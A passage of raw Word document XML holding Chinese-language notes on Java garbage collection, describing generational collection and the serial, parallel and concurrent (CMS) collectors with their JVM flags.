        <w:t>分代（</w:t>
      </w:r>
      <w:r w:rsidR="000F2376" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Generational Collecting</w:t>
      </w:r>
      <w:r w:rsidR="000F2376" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7557" w:rsidRPr="00F41A4C" w:rsidRDefault="0045248A" w:rsidP="00DF3BAA">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>现在的垃圾回收器（从</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>J2SE1.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>开始）都是使用此算法的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE5401" w:rsidRPr="00F41A4C" w:rsidRDefault="00CE5401" w:rsidP="00DF3BAA">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE5401" w:rsidRPr="00F41A4C" w:rsidRDefault="00CE5401" w:rsidP="00DF3BAA">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D7706" w:rsidRPr="00F41A4C" w:rsidRDefault="00582C16" w:rsidP="007D7706">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="007D7706" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  JAVA</w:t>
      </w:r>
      <w:r w:rsidR="007D7706" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>垃圾回收器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB0383" w:rsidRPr="00F41A4C" w:rsidRDefault="00BB0383" w:rsidP="00BB0383">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>垃圾回收的回收器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB0383" w:rsidRPr="00F41A4C" w:rsidRDefault="00BB0383" w:rsidP="00BB0383">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>串行（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">–XX:+UseSerialGC </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB0383" w:rsidRPr="00F41A4C" w:rsidRDefault="00BB0383" w:rsidP="00BB0383">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Out of Box</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>算法，年</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>轻代串行复制，年老代串行标记整理</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，主要用于桌面应用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB0383" w:rsidRPr="00F41A4C" w:rsidRDefault="00BB0383" w:rsidP="00BB0383">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB0383" w:rsidRPr="00F41A4C" w:rsidRDefault="00BB0383" w:rsidP="00BB0383">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>并行（</w:t>
      </w:r>
      <w:r w:rsidR="00EA43A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>–XX:+UseParallelGC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB0383" w:rsidRPr="00F41A4C" w:rsidRDefault="00BB0383" w:rsidP="00BB0383">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>年轻代暂停应用程序，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>多个垃圾收集线程并行的复制收集</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，年老代暂停应用程序，与串行收集器一样，单垃圾收集线程标</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>记整理</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JDK 6.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>启用该算法后，默认启用了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-XX:+UseParallelOldGC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，性能大为提高</w:t>
      </w:r>
      <w:r w:rsidR="005C26D5" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB0383" w:rsidRPr="00F41A4C" w:rsidRDefault="00BB0383" w:rsidP="00BB0383">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB0383" w:rsidRPr="00034868" w:rsidRDefault="00BB0383" w:rsidP="00BB0383">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>并发</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(Concurrent Low Pause Collector)( –XX:+UseConcMarkSw</w:t>
      </w:r>
      <w:r w:rsidRPr="00034868">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>eepGC )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB0383" w:rsidRDefault="00BB0383" w:rsidP="00BB0383">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00034868">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00034868">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00034868">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00034868">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00034868">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00034868">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>启用该</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数，默认启用了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-XX:+UseParNewGC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；简单的说，并发是指</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户线程与垃圾收集线程并发</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，程序在继续运行，而垃圾收集程序运行于其他</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上。</w:t>
      </w:r>
      <w:r w:rsidR="004F26F1" w:rsidRPr="004F26F1">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可以保证大部分工作都并发进行（应用不停止），垃圾回收只暂停很少的时间，此收集器适合对响应时间要求比较高的中、大规模应用。使用</w:t>
      </w:r>
      <w:r w:rsidR="004F26F1">
        <w:rPr>
